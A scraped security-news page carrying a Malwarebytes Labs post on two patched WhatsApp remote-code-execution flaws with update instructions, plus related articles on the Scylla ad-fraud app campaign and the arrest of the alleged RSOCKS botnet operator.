Want to stay informed on the latest news in cybersecurity? Sign up for our newsletter and learn how to protect your computer from threats.

Cyberprotection for every one.

FOR PERSONAL

Windows

Mac

iOS

Android

Privacy VPN

SEE ALL

COMPANY

About Us

Contact Us

Careers

News and Press

Blog

Scholarship

Forums

FOR BUSINESS

Small Businesses

Mid-size Businesses

Large Enterprise

Endpoint Protection

Endpoint Detection & Response

MY ACCOUNT

Sign In

SOLUTIONS

Free Rootkit Scanner

Free Trojan Scanner

Free Virus Scanner

Free Spyware Scanner

Anti Ransomware Protection

SEE ALL

ADDRESS

3979 Freedom Circle  
12th Floor  
Santa Clara, CA 95054

ADDRESS

One Albert Quay  
2nd Floor  
Cork T12 X8N6  
Ireland

LEARN

Malware

Hacking

Phishing

Ransomware

Computer Virus

Antivirus

COMPANY

About Us

Contact Us

Careers

News and Press

Blog

Scholarship

Forums

MY ACCOUNT

Sign In

ADDRESS

3979 Freedom Circle, 12th Floor  
Santa Clara, CA 95054

ADDRESS

One Albert Quay, 2nd Floor  
Cork T12 X8N6  
Ireland

A week in security (September 19 – 25)

Categories: Exploits and vulnerabilities
Categories: News
Tags: WhatsApp

Tags:  CVE-2022-36934

Tags:  CVE-2022-27492

Two RCE vulnerabilities were patched in WhatsApp. Both vulnerabilities were video related and could be used to compromise your device.



(Read more...)




The post Critical WhatsApp vulnerabilities patched: Check you've updated! appeared first on Malwarebytes Labs.

Posted: September 26, 2022 by

WhatsApp has fixed two remote code execution vulnerabilities in its September update, according to its security advisory. These could have allowed an attacker to remotely access a device and execute commands from afar.

These versions of WhatsApp are affected by at least one of the vulnerabilities:

*   WhatsApp for Android prior to v2.22.16.12
*   WhatsApp Business for Android prior to v2.22.16.12
*   WhatsApp for iOS prior to v2.22.16.12
*   WhatsApp Business for iOS prior to v2.22.16.12

WhatsApp for Android prior to v2.22.16.2 and WhatsApp for iOS v2.22.15.9 are affected by both.

**How to make sure you're protected**

There are no indications that these vulnerabilities have already been exploited. The vulnerabilities were found by the WhatsApp internal security team and silently fixed, so there is a good chance that your WhatsApp has already been updated. However, it never hurts to check.

_Note: the methods described below may be slightly different based on the brand, type, and model of your phone, but should give you a good general idea of where to look._

If you have an iPhone, go to the App Store and tap **Updates**. When you find WhatsApp, tap the **Update** button next to the app. Your phone should then start installing the update.

If you own an Android phone, click on Play Store, then on the menu button. Under **My apps and games**, tap **Update** next to WhatsApp Messenger.

Stay safe, everyone!

**Technical details**

CVE-2022-36934: An integer overflow in WhatsApp could result in remote code execution (RCE) in an established video call. An integer overflow occurs when an integer value gets assigned a value that is too large to store in the reserved representation that can be represented with a given number of digits. Usually this will be higher than the maximum, but it can also be lower than the minimum representable value. By writing a larger value into the memory an attacker could overwrite other parts of the systems memory and abuse that ability to remotely execute code.

This RCE bug affects a piece of code in the WhatsApp component Video Call Handler, which allows an attacker to manipulate the bug to trigger a heap-based buffer overflow and take complete control of WhatsApp Messenger. A buffer overflow is a type of software vulnerability that exists when an area of memory within a software application reaches its address boundary and writes into an adjacent memory region. In software exploit code, two common areas that are targeted for overflows are the stack and the heap.

The heap is an area of memory made available use by the program. The program can request blocks of memory for its use within the heap. In order to allocate a block of some size, the program makes an explicit request by calling the heap allocation operation.

CVE-2022-27492: An integer underflow in WhatsApp could have caused remote code execution when receiving a crafted video file. Integer underflow errors are usually errors that occur when a number that should always be positive gets assigned a negative value. A perfect example of an integer underflow error is when array index errors are used with a negative value. This type of weakness will lead to undefined behavior and often crashes. In the case of overflows involving loop index variables, the likelihood of infinite loops is also high.

This RCE bug affects an unspecified code block of the component Video File Handler. The manipulation with an unknown input leads to a memory corruption vulnerability. To exploit this vulnerability, attackers would have to drop a crafted video file on the user’s WhatsApp messenger and convince the user to play it.

**RELATED ARTICLES**

Critical WhatsApp vulnerabilities patched: Check you've updated!

The ongoing ad fraud campaign can be traced back to 2019, but recently expanded into the iOS ecosystem, researchers say.

The threat actors behind a newly discovered malicious advertising app operation have been active since at least 2019, but researchers tracking their evolution report the group has become more sophisticated, expanding beyond its previous Android-specific attacks into the iOS ecosystem.

The latest campaign, according to researchers with Human Security's Satori research team, included 80 Android Apps lurking in the Google Play store and, notably, 9 in the Apple App Store. All together, the team reported the malicious applications were downloaded at least 13 million times.

Once downloaded, the malicious applications spoof other apps to rack up digital ad views, play hidden ads the user couldn't see to gain fraudulent views, and even track legitimate ad clicks to hone the group's ability to fake them more convincingly later.

The research team, which flagged the apps for removal from the official stores, calls this latest iteration of the attack group Scylla. The earliest version of the group was called Poseidon, then Charybdis. Scylla is the third wave of attacks from the threat actors, the Human team explained in their report.

"Today's announcement of the disruption of Scylla — named after the granddaughter of Poseidon — reflects a new evolution from the threat actors behind the scheme," the Human team said about the find. "While the Poseidon and Charybdis operations centered wholly on Android apps, the Satori team has found evidence that Scylla additionally targets iOS apps and has expanded the attack to other parts of the digital advertising ecosystem."

Human Security worked with Google and Apple to remove the malicious applications and is continuing to work with advertising software development kit developers to mitigate the campaign's fallout.

"These tactics, combined with the obfuscation techniques first observed in the Charybdis operation, demonstrate the increased sophistication of the threat actors behind Scylla," the Human team added. "This is an _ongoing_ attack, and users should consult the list of apps in the report and consider removing them from all devices."

Malicious Apps With Millions of Downloads Found in Apple App Store, Google Play

A 36-year-old Russian man recently identified by KrebsOnSecurity as the likely proprietor of the massive RSOCKS botnet has been arrested in Bulgaria at the request of U.S. authorities. At a court hearing in Bulgaria this month, the accused hacker requested and was granted extradition to the United States, reportedly telling the judge, "America is looking for me because I have enormous information and they need it."

A 36-year-old Russian man recently identified by KrebsOnSecurity as the likely proprietor of the massive **RSOCKS botnet** has been arrested in Bulgaria at the request of U.S. authorities. At a court hearing in Bulgaria this month, the accused hacker requested and was granted extradition to the United States, reportedly telling the judge, “America is looking for me because I have enormous information and they need it.”

A copy of the passport for Denis Kloster, as posted to his Vkontakte page in 2019.

On June 22, KrebsOnSecurity published Meet the Administrators of the RSOCKS Proxy Botnet, which identified **Denis Kloster**, a.k.a. **Denis Emelyantsev**, as the apparent owner of RSOCKS, a collection of millions of hacked devices that were sold as “proxies” to cybercriminals looking for ways to route their malicious traffic through someone else’s computer.

A native of Omsk, Russia, Kloster came into focus after KrebsOnSecurity followed clues from the RSOCKS botnet master’s identity on the cybercrime forums to Kloster’s personal blog, which featured musings on the challenges of running a company that sells “security and anonymity services to customers around the world.” Kloster’s blog even included a group photo of RSOCKS employees.

“Thanks to you, we are now developing in the field of information security and anonymity!,” Kloster’s blog enthused. “We make products that are used by thousands of people around the world, and this is very cool! And this is just the beginning!!! We don’t just work together and we’re not just friends, we’re Family.”

The Bulgarian news outlet 24Chasa.bg reports that Kloster was arrested in June at a co-working space in the southwestern ski resort town of Bansko, and that the accused asked to be handed over to the American authorities.

“I have hired a lawyer there and I want you to send me as quickly as possible to clear these baseless charges,” Kloster reportedly told the Bulgarian court this week. “I am not a criminal and I will prove it in an American court.”

Launched in 2013, RSOCKS was shut down in June 2022 as part of an international investigation into the cybercrime service. According to the Justice Department, the RSOCKS botnet initially targeted Internet of Things (IoT) devices, including industrial control systems, time clocks, routers, audio/video streaming devices, and smart garage door openers; later in its existence, the RSOCKS botnet expanded into compromising additional types of devices, including Android devices and conventional computers, the DOJ said.

The Justice Department’s June 2022 statement about that takedown cited a search warrant from the **U.S. Attorney’s Office for the Southern District of California**, which also was named by Bulgarian news outlets this month as the source of Kloster’s arrest warrant.

When asked about the existence of an arrest warrant or criminal charges against Kloster, a spokesperson for the Southern District said, “no comment.”

The employees who kept things running for RSOCKS, circa 2016. Notice that nobody seems to be wearing shoes.

24Chasa said the defendant’s surname is Emelyantsev and that he only recently adopted the last name Kloster, which is his mother’s maiden name.

As KrebsOnSecurity reported in June, Kloster also appears to be a major player in the Russian email spam industry. In several private exchanges on cybercrime forums, the RSOCKS administrator claimed ownership of the **RUSdot** spam forum. RUSdot is the successor forum to **Spamdot**, a far more secretive and restricted forum where most of the world’s top spammers, virus writers and cybercriminals collaborated for years before the community’s implosion in 2010.

Email spam — and in particular malicious email sent via compromised computers — is still one of the biggest sources of malware infections that lead to data breaches and ransomware attacks. So it stands to reason that as administrator of Russia’s most well-known forum for spammers, the defendant in this case probably knows quite a bit about other top players in the botnet spam and malware community.

A Google-translated version of the Rusdot spam forum.

Despite maintaining his innocence, Kloster reportedly told the Bulgarian judge that he could be useful to American investigators.

“America is looking for me because I have enormous information and they need it,” Kloster told the court, according to 24Chasa. “That’s why they want me.”

The Bulgarian court agreed, and granted his extradition. Kloster’s fiancee also attended the extradition hearing, and reportedly wept in the hall outside the entire time.

Kloster turned 36 while awaiting his extradition hearing, and may soon be facing charges that carry punishments of up to 20 years in prison.

Tag

#android